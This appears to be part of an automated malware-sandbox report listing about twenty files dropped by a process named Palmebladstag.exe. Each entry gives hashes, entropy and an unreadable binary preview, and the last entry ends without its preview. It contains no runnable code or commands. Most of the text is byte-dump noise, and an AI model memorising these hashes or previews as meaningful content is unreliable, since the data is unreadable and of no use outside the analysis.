                                          Preview:.K..j..............L._.............8........u..............y.v..a.........h............ .e.......bX........................N..<.k...(.....<$...............@Z.3...5......(..#Z.G,...p.....d..................S........2.4....G..A......<..........'.......c.....H......j....;.../.,..M.}............i.........q.................6..............,...B..........;..;s.N..N.&ot..r.$..v..U.........,....Q..W............2....u...s.....Y>.hU+.P..95.F....0 ......H.......T.....d...........Y..........{..........8....W......Q..........I...=..L...^_+..&....V..........E..|..c..e.;..........Yu.........;5....................b.z......."......B.~...h.................g.(.....O...uH......s......l.....n..w\z.d.......I....9S.......Gr~..b...........I...U.2...l...........D.!.........9..........*....G.......N.;%...-.........].,....o..a...#..........?....B0..K.^...................D.....s...........|6N...............^....FX.....$.W....!........v4....0........0.e.........6..`......Y......#....J...b...9;...t...7B
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2118
                                          Entropy (8bit):4.838617186722891
                                          Encrypted:false
                                          SSDEEP:48:6pvPUku3xeXNjcOrIOgr5TZ/ZUynHVbZ4FohVYY77ZX:6Bv40XJcOrIOgr7ZXHEFohi8ZX
                                          MD5:33A6FCB27AE4B04E1A604A958BB5D285
                                          SHA1:3AC55909A34E2C22467B490672729FD168845672
                                          SHA-256:A9201F9F443C811DC072DC5D086B42A957A0D57A2176106D591AF4211CD300A7
                                          SHA-512:6287DEB3A330422808C18D5E6505904B1731F87AD041074023F5D90BD03AA542A764A8C764BA354EA0A63A6E2DE9610D8C74FAD32413659E9177AD425EE2C301
                                          Malicious:false
                                          Preview:.h...f...6..}.(..p./$0k..\.....z..iCp#..................I........8d.........Zs.$UtB....._.......I....r....t....................k..M......Q....g...........Q..|n..............S.h............*zR."..........\..i.............bO.....|.......%.N..............`.......6Y4.........%.].......t....u....u........C..R......a..................Y.......(..H.....u......n.............e........V=R........o)......T......................................B..C.......C.....r[.S...;.@.......m5...?.._..1..7u..9o....t.k..G.........N.G.x.........(....q..........|..R....&....N.................e..>2+;......s....k........Y&.c)....B........*............%.Q.`....E..s.R...a.....w..C......G7.....@o.G.(Ck...9...............;B..)....../....F..O..................[......4........*..ln.....3...|;...b.............;-*.P.....NI.......Ux.q..2!....3.6.....#h...A...;..................8..n...s............n..\...g.....w..7......r7<...>.G......9........[.U..q9.........-........@.9....\..A.............-.........+... R...#....H
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1763
                                          Entropy (8bit):4.76837103190463
                                          Encrypted:false
                                          SSDEEP:24:2oGNPdA9YJ3MDEJeD8MeN/faEAtezyL7tO8q2sRCOtmn6xXcv+6:2oGNlA9YKOeDfqlz+7Q8tGHBxX2d
                                          MD5:7383B499654700D3A02648EB6F1A31AA
                                          SHA1:3799332AA427CB6A47862EEA20561171A3E70012
                                          SHA-256:32F53187721A58924FBE76739994053FA8C731AF090CEE5EBD7FBE48C05C6901
                                          SHA-512:7F63F89514D8B20BE42A0521A56B2AD5B788F35C68E3B3B2509CF71A2AA43C09BC8A207D66D58C90C4353B71A02235410141276BA509AEF153B7C6E6A70EB7CF
                                          Malicious:false
                                          Preview:.............u.9.fL.....s.....:........#....eO......wx.v...........................J........1......._.........X.R..l\.dv.......xM......~........................V..............S.p...d..... .vt........f.....t......#......B...........r....P.............[...5md.......T..........khi.....A......y......e.BS......\...Q....N..V.R..........9...........s.....av..........K............\.............p....M......L.........L..`'z...........[....|.........+A........@............@.........I...*.....7....J.......... y..._5.............j...e...V9.............-.O.....SE............7.$..............d0....D..............m.....A....B....[...9............. .........!y0X..7....K....=..../.|..c.....X8v.........o........p>K......._......-.m.....................R.n:J....0.f[=......,....I.......q..fh,..U).............K..q._.*......(........n.#...L...............X^.*.)%.s.....P...............[.n.........../..&................k.........+._..t....O..-......q...............F....Q...F..2...m.............
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2091
                                          Entropy (8bit):5.012149594226418
                                          Encrypted:false
                                          SSDEEP:48:c2rkyQ5tAiG/9RnQ+hs5x4CrGw1d1LEgPFJIDNuoYMj:HQ7evMNKwzht/6NJ3
                                          MD5:021F6FBA6E735E33B7A6F1E825616ECA
                                          SHA1:70D202AEED2BED60263CF30D155E6F6AA00CA91E
                                          SHA-256:E0DCE38F52987ABE51961470D22C6C150E6D64F6737D0D45D73ED3E75A4F51D3
                                          SHA-512:ACE6F79DFFEB857BB20346903F30B7CAEABD4938D1F31A502267AE821A2669458469E1073D9638899C547BDF8358A39709DF4E8DD4E51FABBDC38BB24FFD4371
                                          Malicious:false
                                          Preview:.........DW.B....w.....%..&..{Ftk......j.%??.............l..F..T...I..+......,....q.\......_.!rX........u...._.......m...........Hu...l.......<...............H.E?.......f...........G......s.....^..F9.t........%....e.......s&...........%l..........f....Fs...........0.............p...i.;..,..~...w.t..N..5k...................Y1aL..B.......s..V.........j.}....D..gm[....E.o. ..Gt.........n-.K.........\&'..&.x.o..B......\.......p..._....^...7$...."t3.r...p..=.........g...3......................W........%..=.....).........gZ...Z.(..F).l...*9............1......1...e.O.......L3.......N...............................V..H......\.......t*.v..k............q....[.5.D.......SI........Y..d......}..x.........M...x.....{............@...O.............4..7.)..p........m......>.-............e..>...>.......mf...........x.............<....5.;h@......R...;J..n.........W......Op....h....Ej...../.......j..i...>&......................b......:..a......."........m....b................XB...........}.NU.
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2229
                                          Entropy (8bit):4.9350505626458245
                                          Encrypted:false
                                          SSDEEP:48:Vri4jtPELImBqYp27JYr7Z/Rs8N93fc1WS0:lPEQ/4Ps8Nh0r0
                                          MD5:5F4074A1403F5DB9494A2072EA983311
                                          SHA1:4357D09720A4F5EA61B7F23857F533E7E3CA5861
                                          SHA-256:4BFD4209FED65248EAF515D1217BC0845EE9C349BD4436547D20F695D0BAA86F
                                          SHA-512:5B6E9CBF9F950F849183371AEB380AFE86E1378D45B649B9C53B6C07F3BF1B11CF05D6DCF5CC4755FE44315478C00932CBFB440046167A58E064ED01892874A1
                                          Malicious:false
                                          Preview:....,.>...n.!..........{<..g....#.....m.._.............;....[..y..C......9...................B.@.....sd}.....gK.....|....p.......>....e73]........@..y.......(C.<..S.....>2m...&...x&..%.NT:..........i..f.....a...'.........Z.:.............!...?....8......(.3..........i_.,...V..............r...{....s..........e..T..................7..l.<...].....Z.QH....ao........z8...v.....".......%.......^....7.P.Po....Iy.....@.........&......>.........1............%.......O......l.7........R1.F......d..........8.s.....;......5..../..a...4...i.................4............(.G.....................NO..................4..st.\}..n.]...M..B|Z............}.....W....7...n......R.........*..........5...2.r..............:........D....j....DB+..;."@......b..w.V'....K...........+..bPEJD....M.........Q..+.....B..........a.............`..../....Y...3..;....H........#........(@......N...........V...........Z............I..Y...@.R.......l.2......../.....m.y.......P......5..A......V.|.......Vx.....]e........
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3068
                                          Entropy (8bit):4.9515728451882355
                                          Encrypted:false
                                          SSDEEP:48:duqY7E5yCkgu6aA8AjBeSHiYOS+Qq+g0zHv94ce8yiIo2ZnTTlin:XgEuPRAVe8iYr+M94PjdlTT4
                                          MD5:985739166965E39D9875695207C1D436
                                          SHA1:6201AA16E1D8D64E9C7CAF023E82E58CC1BB8CA6
                                          SHA-256:3921B260383E1E78A85D5A058869EEEA157733412A4F14311B8383852BFCA029
                                          SHA-512:5E29368838232F8626EEDFB81619D78F70568058B928ACDDD66B838ECC84820C8D8AD56D2B72E108BD413A1CB977D443A41BE883542F6F57BC750963D7DEE5B5
                                          Malicious:false
                                          Preview:...'...5.........$......+.s.......:..........l/..C.....4...........v}...e....V..+"... ...&..............G.6.........Y..[.jy./. .3h.[..@........`...s.._....."........x...S......?.H2Z..1....8f....9........P.......ku......P............P`........^.......6........l......O..z4n.............|....m..................g.X.Y.07.=;.....$..7.........x.z...e......pb.....K./~..p.......q....H......tU..@...Zo..p......(.?................5.....]..A...l...0.............8..1U...l...................q.....~............m........... .]...P..Z....s......*!.......a...!....~.F.n..d.........4...........{.......l..w....).........D...1..................}..^..y..........x..........k...............W...K.......W........g]J...QX.F.DY........+...X......c;V..m...V.....&..........:-.q...........?.....<..........."......]...]...,Z........................A.......;...|...r.......b."...`.[..-...x0.".......<.z.........1.......a..<.........L.O.IK....k.{S.........k..I3Q.!....2...R....X....Td..3................../C..
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3773
                                          Entropy (8bit):4.925227736862119
                                          Encrypted:false
                                          SSDEEP:48:7lt6gz4MqZLnWJtbb69AgLpOI9pdw2XnJ8ggkgmj/CF2Gbzqz/jY/GHlmiZb5inH:RtOWPbb69A2Qydw2X2ggkf/uIUMmz2U
                                          MD5:52493399EEC45A059956564986563B3C
                                          SHA1:D2F8B031714842F6D663CC8E98B3B0C536337AF5
                                          SHA-256:B77085010B1D7224C27C023DCE09EED44A63F0E4225BFABB4242132F3C2250CD
                                          SHA-512:4728D04D3A36383C37F40D08C7AB449227315EAFCF4F524A69162F2098E43EBF7338E95F74FE64B8908E59DECCC3AF2EBE8437E53AA912F9F6D5B0CCF103CF59
                                          Malicious:false
                                          Preview:.......).4..........v0.t...o..........b...4....*.........P...i.g.f........5...............Q..'.{T........*.k...`....l........u.......?.....Q.|....51...'..x....N....7...]......Z..r....M...F..q........*........4....(...%...p`.R.....U... .1....f.....e..s....q..j.x...(........b.....U..w....Xu...+q........v.^..........c..x..|........P.f............+.u.Q.[....... ........`...^2........z.o................9..bM.......(..........M.X..q...d.{....T.........k.....O....`7,.....D.......>wC......w.-......}..........Ui....e..b..b...........~.........g............,..)}.?..w.....?...%................d........&J......C.d...{.....U..........Z..86.....I......3...?!..;.....................!.u......................Se...yK...6........}T..E9......14.....T.....:....H....%......].]...;.g..d.....n..,.....7....E..........................H...O.E..............!^.............t=X.y../..F.._.....u....O.....g.s.$.v...f.................~.....t......G..XR....M.H....>L.....A.......4..h...........^..o.-...
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3860
                                          Entropy (8bit):4.9215636666992
                                          Encrypted:false
                                          SSDEEP:96:jAos2QwxOr6GfvrmPb6EvdM89KPSEj9hzpL:jY2QwxOrbCp+Wy9hz1
                                          MD5:371DA4CCB65BD743B8F222A4411725D8
                                          SHA1:1CFF176FBF1F8FE7D1C8CB84EFC66EC78BBE8A1A
                                          SHA-256:97C8CA089C3371005EF0158230B2CC0059533473202DBAD2AF39DFBA4F0489BB
                                          SHA-512:4986C530883E7F7EF5E267D2F01D47B34AB27DD85C3D863731AA3621A0DC7709178D9CAE3F9874DB048CF60121681F72BB7CCB1CEDB7C02CBDDDA32B98D941A3
                                          Malicious:false
                                          Preview:.....@.}...w.....q.y.c..8....A.....e............X..O.S.Y......&.b...:..r.........~......,.........T.\...K..i..>.!..:....i...B.M.@._.|......zN...h...............8...E....D.$..........[..#.....Z..f..#....Y......x.....&......K.....d.........`........{...|./[%.......`...:.....H...(..c.C...1..G........."...8...........h.:..........n.........w..7...............F......i...........R.......zC...7g.........V.$.....g.........w.......V............j........K.....{f.............2........]Y.....@..........[.3....t.......pHf...P.....-v..0..1.(..%........z...g....j.w.6.C...0.....bC.........t....Lv...'.....7..................D.......7..A.J...[....0..gL......gs+....0..y........X.6@...Z.F....8..........*.........Bt...N......Kk.....5....P.....:..=...N..0../......x.......5..P..........H....*.............]j.......d......x....e......_....c8i......v.t....7..X....P.....n.........!.....4.....................Q..#...k........).....m..P....4W%$..,.....{.....i.....1......E+..v.`U..-...............o......
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2586
                                          Entropy (8bit):4.796852061643136
                                          Encrypted:false
                                          SSDEEP:48:iLRhtDGWAgd6Xy7wNGLQ/Brwoe+RPiTH/M7aPXErQTrux1X:OtDGWAgwiEN+QNwoe3H/M74X1TWX
                                          MD5:2E328B405A9EAFE3E48AB60B2557F991
                                          SHA1:47DA2DE18CB2BD0AE85204C53B7652C0561C2072
                                          SHA-256:8E083D948BCC5D72F8A091336048BE5FCB84399737DDF8CB5E3A17D077B89C1E
                                          SHA-512:E9A8AF25BEA88D06161762D310EEFDCA2A6818DCB0B49C3CC9671BEB00BFDF8DB4802949518E15D7EA9042F0193D8374548A6BA6E6C25990610BC3FA6245C76E
                                          Malicious:false
                                          Preview:$............@.........F..>.......=....G.............S.....S.......]....e...2.h...............I........%..............%....h........C...........%..8...m......0.1...p4.............H...q...8.....$...........b.|.....9................/.......c._X.C...........Np....V&..#....a3...p.......=......p.-......E.....}..............z.....i........7........v..9B....i............@..^..................k.......@bDk.(.XJ..l.................(.....Nh...kJ......6....u..<..?.................*D.....q.j.8g~......>O........O................Y...s.....a..~..Q..*..............J..P.....4.......@..t...{....W._.<....+X.?...;.>8........_.s.3.......+........\...C.....Ay.Cc..d..........................C...l.....J.....9I.....E..U...^..X..Vw......tF.l........,...X..............&.9y.........GK.>.s..A..,..D......w.k..|@.. t........... ...[)......w........T.........R....*.I......)...!./....Bp..........o.C.8..%d...]...w.Q.....C._u..w........"@.b.......F...s........., ..@P..#................6..............p'.......
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3816
                                          Entropy (8bit):4.8661694239656335
                                          Encrypted:false
                                          SSDEEP:96:hJrdlZc8hW7qO2/XrxBUoE8XOySxn6IRm:hJJXcsW7H2/XUoTexVLo
                                          MD5:6FD572C21DEBAA10FBCFFD06903DDF59
                                          SHA1:B88484C4CEE3487D6BBAA1C060E0BC4E4AEB1412
                                          SHA-256:B81BF124E01A3E910CA976737021FF7D24F86D07F98B593376352572F2F6295F
                                          SHA-512:2D93D531F8786CC489492848DE0554AA6B877CEA46ACB44B5180F2C298943A18F35F9D71D5897760516CECCB7A96599ABD0B88303460A2503ED8197FEE0E4359
                                          Malicious:false
                                          Preview:+.........8N....E..D.k.....Y0.'...g...........A.....f.5...................................oY...g...^..............4.....L.......9.x....|......g..Y.......a...C.....*eX...`.u....J...?5.1.3...0%c...!.k....+.,....................e....C.{^.r... .[j........47......+Y........_..8...m..................J......<....0.......xnj...U.......)....................`..........7.........c...N.......................s.j....=.....!8..N..fY.....................E...{...,......b._.........\.....=x...."B.)....5....z].z...b...........{;....U.:.p.......r.....u..b....6....<:.B....... . ....&.....qR......`.D.........R.....w.....g...;..3.@..}.j....;..................#..,....%....#..+Q....9.K..6@...\.G.............)...`.............%......m....Y..Y...................y....................4....~!.D.3...\...7.R......K...?.;......L...........y.....<....Y............d........-..x..)........|.L......?..]....y............!#.s..O.......N.z....BNE.....9..o.(.............8. .....u..2L.^.n-#.*...@.J.C........d.V.....Z.
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1090
                                          Entropy (8bit):4.798536203128133
                                          Encrypted:false
                                          SSDEEP:24:KgyqPYEWTe2iReC9fXhmE6LNHdl57o68VoIi/opwl:RpPudiRedHn158Vop/B
                                          MD5:DA586D34FA9E1E41295E7FDB0566CCA9
                                          SHA1:1815F01949C7E5018EFE35222A3154D0FE4F8407
                                          SHA-256:EE46561B0CDF07626A504B104DD9E634A8D342AB0BE32646024B29C1EE9F0A14
                                          SHA-512:FEBD65E10BF6BD228A2F49422932357039941A98A7F5BCFDE11809641A026FECF544237850D7E080C7DF59EDEFF8E6C24AC1E4B8FEF08904C0325C55F5D60E70
                                          Malicious:false
                                          Preview:......,.....Z...*].......3....p..<........].....i1'..........0.......l...p......./...x.Jw...]......x.i..m..................K................R.......CV6............c .......g..............<l..........0......'Fv..X.......~./..............P..m....@.t..eHXR.T........j...............7,r.....kL(.3]...........b....................\..95.R.e..]...R....d.........$...R...r.....x.......9.TH..4.......................8.^.z...*d..1....b..........j.X.2..............G.Yz.............].........ks......2.....o....n..............L....p..............................Q..{&........._....j..t.C....S..I.......`.E.....w......b...R_.....D......,.....`...X.qo....o..............>...9...M...........c_.K...................T.H...V....P..V...............a...os./..>D....U...........=....#.<......a.....p......{...:............h..B.....;...*...[..A.....}O...@..!w.r..2f..e.O.....t..V..."..._...........'.........A.k....{............E..#...@z...........}9....3..W..3...*...................1.....p.........R....
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2082
                                          Entropy (8bit):4.80925005967052
                                          Encrypted:false
                                          SSDEEP:48:fUKgA9QgbdHonEmjpvtslpTeau28Y/5jIkTDaQZ9ZMhJ:8K5xbVonLNG9u2pBIYbZbeJ
                                          MD5:F3487553E8A219594BEFB355575367EE
                                          SHA1:A77C17311286C0C4A488370BE45F90043C19CEBE
                                          SHA-256:53000EB8B8891BE0823DF5900111B0C8C3347CC9921BB150DE24BAE74DE47B92
                                          SHA-512:558D037416FC9D392BFC533FC81F8197A56EC0AFECFD841535A1988370FBDCA57C431CDC3954FC7660CD3125D44AD656192D5159149EC8C837A32170F3E72CD8
                                          Malicious:false
                                          Preview:.....=.............).[J..........B......f...7.........................2..7............)y............;...Mh.5...@........1.O.9....G..............*H*..........o....}6....HP.-..............W.R...#._......+..Z...7..=..........TK......#_.......z....j...........)\z.....K...p.....r.....7...#@...!.......6...S.....................E........G............X..9........$.....V.......&..{fk....C.....5..l.........f.......4...1......3........#........................tW.+.....%............)6A......U.......U.o...=LP....5...x`....................p............j...R..$..".;.....$.....=T...G..%............t....=.&..S..x......p....................M.R.........3.d.........2..Sd......<.h...-.............^<lNO...9........f..-..... .G....._....&....;8...G=..y..-....1...............:q.........du.................k....9..................(...K...c...............................e.s...........zm$...iQ.p.....1...e...........'...-.........4../....v....T...............1.+......V...=6......=......)......8..&..,}#..
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3122
                                          Entropy (8bit):4.974807459915487
                                          Encrypted:false
                                          SSDEEP:96:psPRuYNJbNrNF3mrcjx/aznnE9bvxWq16iPi0f7xsNc:2ZuYfbNrNZmAZazsxWq/dfF1
                                          MD5:9976225279288056E0812711C59A2493
                                          SHA1:920782936F7AD22D68127CCA29BA17122A837EAD
                                          SHA-256:B9094790E56C35B5CBFD69DF6EDED789C6E2257F2E75157EAF92A90FB5868433
                                          SHA-512:68E27001EAA849E42F687C1C358309952894B4776F7585F0608AB0E53FCAE759F6E19FBEB6DEEDE795567BF90AB3A5D393C78EB8EA48B755DEF859B33A231D16
                                          Malicious:false
                                          Preview:.\..e........W9..{.........}...............gu.........o...Q..>.j....x....]...V...>.....j.......O.tu@..i........*.......3..".....9....n..O...h..../-.i...............................7.S:...............E*7.......W..b/w..............................-.....................b....L.3...r.>.....c....30...........X.c....m............... ......)......1..\...K_..J...u..5.....$..o...\....i.I........T....z_......%S%O.h.E........."......A..QI.K..............<..8!......$...x.........@.........s....L...?.......@....^......9.6[.....3........z......A(.....F......U/............T..................l...<.].......;...f.6.8"F..J.......\.....B....{.v........*.........mb.[....4.r.}.........J@...nE.......a..........V...El.1Z.U.....7.. ......}5.g.....S.+..A.!.....v.++........`.w...%h......U........}..B[.........8R.....\....xZ....8......|Ls/..........Bk...G.w......R....L.. .....@.......C........,......]......................Q....P..W'.?.v...yN...._....I.o.a..o....3.2v...F..R.....1....a............._i..
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2702
                                          Entropy (8bit):4.910381514503629
                                          Encrypted:false
                                          SSDEEP:48:UP0G0Bo/K/ma/Ly6ikhXthETjI15zf2TC/9oP22pUL1y5Sp7vIDJC0+qMy:w0G0Bo/Kua/sOzCk3zIvOFpjFGX+py
                                          MD5:238A3D5C7153A3CC81EF9FC87187AF2C
                                          SHA1:DDC0FAD55745F0D04E99973F471658E27BB95459
                                          SHA-256:647A349BA1D83AA2D7F85EFB30BCF16D59AB410116F00E4966A0A08CE7011208
                                          SHA-512:9B3724174371307E9BA0FE1A3761827A844D49E4F19141148927861205FCDB61278BF6D0A9E4123AA95628CD68D953093D90CF96DB98FCDDE39DAFAFA29276F9
                                          Malicious:false
                                          Preview:....q...N......D.gn.....'.......}#.......g9..e..........I...j........Q...y...VL..+...U...................g...l...............w$........A.nq....y..c.[....b7..%.g..`.1.......s.c..x...x......OG.......I................J..............t..r...8..N.....<{............L...........p......?.....w........1u../..3D...~..Q...^......,>...C..!*..........3....(...|.5...............,./..@..g ...........................p.^.Q..@..............J.....I.........q.......4v.t..#......'..L.L......{.u.o.....u...1.....|..U....7..g..x......$.u..[...6..................a...........4.........VX.G.....j.t$-...:..................*..........Q..............[..^..*............C...........L../qO;.\.h.......[....................^......................-...........].......2]..x..4.......F....)..:%.i...Su..H....o.......T.^..`....g.(........Gm..P..............X.........l....i....o.e!..v.......o..w.u...7.....r.............b.....O......7.........l..............i_................0e:...........U..f.2............
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2413
                                          Entropy (8bit):4.818275888642217
                                          Encrypted:false
                                          SSDEEP:48:y/TPUX6Nw675RpC42NsOrI8uLea99znIdeaOb:yjUXMRC42NFrkHzIdeaOb
                                          MD5:43083C252D1A3C663FFC7EE1119B9CC3
                                          SHA1:4A1BC0FADA9EB1C39B13C4E38295997BE8A80B37
                                          SHA-256:F1533729AF0F31CFCB99260E1F2BBEDE56486AE47B0AA7E8E2F3BBC1C5718F15
                                          SHA-512:6BB9F3681D5B0A5D1C5DEF4A4A703F63713521FC5FDD392CD7D0C2FB15572ACAA2DE3222D216A49E85F9482983BC2B4B517C87D40E58895530EC2AD19F51A851
                                          Malicious:false
                                          Preview:.....!..O...5.........Y..R.......q..@....9..........R........^.....................k.............2.......P..4...K.........Gy7.....<.......V.....`................G..............F..V.............x.....bJ........I.W.X......t.+Y.9..4....."............4.....X.....).!...........P..............D...[...........C.....I...".....@....$........q.x...?..(.J.M....H.........+&...P.m.{....G[......g.9.|...t._..2......c...?...5%....$.J....H....................}..'X..................Kz.................;....s.....%.3?..........K..................+......u..... ..W...TJ...h.A.........................p... .{V....J9bj.4.........P|.t..m...=......./.........^....................a....w...8....(n........z.^........H......[ s.e..F...5$.........w...h....T.3..Y..........a.-b...d.........c...[..u..M....i...Y............k.......m.A.Yb...W....(......E.......L.93...].h...]..g...........H........[...}..#..S...........(.(.......T.....O..N..R.....u....BY.={....Q.]..K..&..........IIp....................Z....3..
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1631
                                          Entropy (8bit):4.744104057146763
                                          Encrypted:false
                                          SSDEEP:48:+ckqxp+fffd3unlN7mGhZO6UzYXAldNV9l/:/xp+PdWP6GhZXXAjNt/
                                          MD5:67C3A84DC66F8595319F2D89FED14F0E
                                          SHA1:9A55A7861E772B188B7E2CC4FDD8B5D55B75C9C2
                                          SHA-256:CAEF5EA2FE81F33E3F43BF53517E28EDE9BC51FF55C84AE0787734E83D94AC66
                                          SHA-512:AC896603FFF12187635775581FB6B41D120CC05670D8A8894B10082C1029BEC1FEFE7E758D21FBECD2F3AD4022611B657CFB10C74A80F96E918BC86CE531A13D
                                          Malicious:false
                                          Preview:....i..f..........RD....&a..^....._...........x.L...T.8....-5.......{....U........ a........J..................0..................Lc.....QU..r......G.......<.j...E..7.@.........B....d......X...*........D............#................W....5.........(..4............5.....y...HX..x...&....?.......dR..I..V..KFWp.-..*.w...$q......-...2...Q.....^.eI.........,...................".....I...'..~....S............h....u..l.2............[.......sH?\.js..iN..[..O.C...<...............&..m........L..t...........G'..)........8.............&...%....[.I...7.....O............r...........q2.../..e........\....c.............. ..............3............Gj.`.2."y..Z...+.1..=[................\........=....$P.......Q.....5....m...............C.......(...W....K.Q............>.....Hv....=.s.-I..........0.r.....h9..4+.y.<....y...A..............................[.!.._..............O....^..=...1.......i...."....Q..f...............U..P.......h...:..........._...7..<.....A......c.......7.w..G............
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3817
                                          Entropy (8bit):4.937811095129554
                                          Encrypted:false
                                          SSDEEP:96:rKLjpRNPlPe7jLSrKL+TfnP/Wf6EPEaAjJym:OLnnPAfpL+D/Wf6EsakJym
                                          MD5:7AD989A6DCC4333F1DD270B2E191DF04
                                          SHA1:D29B669531952795B384D76500B841D766AAE20D
                                          SHA-256:A6ED6DF061947EC62E198FB92D4AE1014BE5448A0CE5F92C77F0316CBFCE42ED
                                          SHA-512:956B8DD3C711199C1D4DDF43C5CDCA75A6B9F4972882FA5C6A142D92FEF181BD9A01C4D9302CD12689F9AFD8FEA6D0AC55C2B4F823D0AE4E0DD98AF0006E1B22
                                          Malicious:false
                                          Preview:..........&.........^........m...L...j.......%.......c......F.......n..,...g-Dx...+.i.....-.....a.|..q.............}..b........W.............R....,.-.x......7.....7m....}.)E2..Q....o...S...............k..w.C.................r......E.n<....1......V.........j.................Z..B.......z..M.....#.....X........oX.....L.|...G.......}.6..k.......D....Z........b...P[t..].@...oY...............Q.S........r.......p.........Is.S...I1...b....Q..0....E....<.k....{..q......O.........9.....h.......6.......v.."..........g...5....|...1......A.(.....T.J.....-...9C.......F\>..FU.M.q.$....Y4.......od....^..^../.K...w....g.N.....K`..q#...k.@...>...\....l=>.............i......F.Y...^..`...................!...,................w..........D.....}..................5........F=....................2.....=..D..4.......$.G.....7...........N.......b..............zF.4...:...@.g.......`......h....K..MY.3......xJ......v.....hB....(.....C........{..A..}...........O..%...."......m...)..f.W...............i
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1974
                                          Entropy (8bit):4.795618682707946
                                          Encrypted:false
                                          SSDEEP:48:yDRh6aTjzVkUswHip0uuDJQPEgGJvha9Gz9QDJEl:ERpTP6VidDJy9W9sWl
                                          MD5:89109E1445B3DC34DB6123C644EE1899
                                          SHA1:3AB91EC84F30D0C0685E7474FFBBE0BD62806F3C
                                          SHA-256:733828EF2DF56D39109AE272C7B9B0276B70032D5E2F38ED75CC6BFD04095E12
                                          SHA-512:FA4A8599E66D3B73B2A9C165B13817ED9D7C19CE5A9BF6566C3CA30664246003BE3AEF9FF5C9297B6A3835AF9B5D6FA8576EAABB04D8BAF9E967060DB3AFAE96
                                          Malicious:false
                                          Preview:....=...:............2.....u..!../.............|.......6E...:...v........g....a..........]...!..*....Z.....)%7...g.i*..n.....\.......G..23......<...E.......0...yN4..p...!p..O.................................U.w....."I..&..p...."s...[X.J.:.....e....}...#P......1,.-.*.~..-..............5.V.....t. .m.^.Z.........9..S0G.....J.T.V.{....q......u.............v......I..3..........oE.q..1...S#...........>..\W.........@.....x...............T...=.1....>....b...k.......?........pk........b....'.................A......@v.....r.s....M.a......`..~...#...........c........1.6....a..E..........!.....c<............(.....D......G.y.."..........:.z../.. 3+....................Q....T.....d......................=.X.....'.$..u...........jS.......x..Jj............Y..|.......y%.....I...mi..^....+......G....<.g.i.....+.....X4+)_...........5.........h..*....;..B...............sn... ..M...W-..........K.....%...........A...J........0..............r..&]......D.....W.,..........S..l.O...........~..+/..^...
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1929
                                          Entropy (8bit):4.7228543897182025
                                          Encrypted:false
                                          SSDEEP:24:D8051eCsnZ53eVELHX78cMqGcHYON/7l5Hj28oVGTQ8jOffEx5CdUeiuvf27XGM1:QZCWZV6qBGXO1/j+6Q8OG0peyMxorWSU
                                          MD5:04A770C27C1B2CC904418053E8E1C2EC
                                          SHA1:F4757F621409B37C9FA39F6CCC24F097C2410A34
                                          SHA-256:032CDD51428CBBDC2611E3716AAE5C49785553F7501550B1406350053864FA4E
                                          SHA-512:026D9AB3B6B9CAADB92804ECDA6792D4432EA56A4CB39696C16CEF3385E0E51BAE055D0DAAF901747C7D81D8B6DE4DFE4B243F5739E7AFA636A084E0797ADFEA
                                          Malicious:false
                                          Preview:.3..G.............h..>...........QF........~.......................J%....=.f.......T6...........%...........c_m>......[..U.....e...Q...O.......@.......1......0.n....yW).....<.k...........:.........d.....B...........YL.4......./........N....................:..6....X../.........3....@<....Q........N...g...H....Zu.$...{..K.J..(......eA..b.....K..(......TLf.........S.Z........P.(T....*..l,....;..CW.....v..Y..o.......v...f....w.........../S....(.. U.k..Rk..J.z...8......7.......&.......................j................'...Q.8.....-......~......"...7...:...................{...>..%......g........Lp........F....In...................................".....|...T.-..Uq......&8..$............%...........7.........*.................o...u.B.......... 6...U.............N?...mv.......D;.....>.T./..... ..m....9..&.:..}..H.........-...~.:..........<....X....$.{...........Q..y.....`4...q..........T.lD.Q.............IJ...j......t...5....8........7..o...^................5...L......{..@)l.....M.j.t
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):592
                                          Entropy (8bit):4.27682633275362
                                          Encrypted:false
                                          SSDEEP:12:Y0qCVeKgmhX1bcezuVlA2PvXFTAITKo4msdWJweXksKA:Y2TgWwCux93zueDXky
                                          MD5:F378CB5026DA531DB40FB1D506C634C7
                                          SHA1:103C987D86B2680A94B3948A7891525FD0C30722
                                          SHA-256:452A29030127517A36778E19B541031A3EBB41578653907966FEB53256268D6E
                                          SHA-512:4859F953EFBCE8F1AE200E799F23C4CB4642E7BD621E533AEDE9055CEAB6981C98A6D16E8FC61C44B29C1D0ABD846C9664C1112E4F13652D2BE18CE5C03AEA20
